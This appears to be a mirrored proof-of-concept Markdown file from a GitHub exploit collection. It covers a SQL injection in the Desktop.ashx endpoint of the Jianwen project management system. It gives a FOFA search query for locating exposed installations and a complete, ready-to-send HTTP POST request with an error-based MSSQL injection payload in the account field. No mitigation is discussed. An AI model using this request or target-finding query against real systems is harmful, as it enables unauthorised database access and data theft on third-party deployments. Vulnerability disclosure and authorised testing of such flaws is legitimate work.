mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-30 06:24:42 +00:00
22 lines
547 B
Markdown
22 lines
547 B
Markdown
# 建文工程管理系统desktop.ashx存在SQL注入漏洞
|
|
|
|
建文工程管理系统`/SysFrame4/Desktop.ashx` 存在SQL注入漏洞
|
|
|
|
## fofa
|
|
|
|
```yaml
|
|
body="Login/QRLogin.ashx"
|
|
```
|
|
|
|
## poc
|
|
|
|
```yaml
|
|
POST /SysFrame4/Desktop.ashx HTTP/1.1
|
|
Host:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
|
|
|
account=1'+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32))<0--&method=isChangePwd&pwd=
|
|
```
|
|
|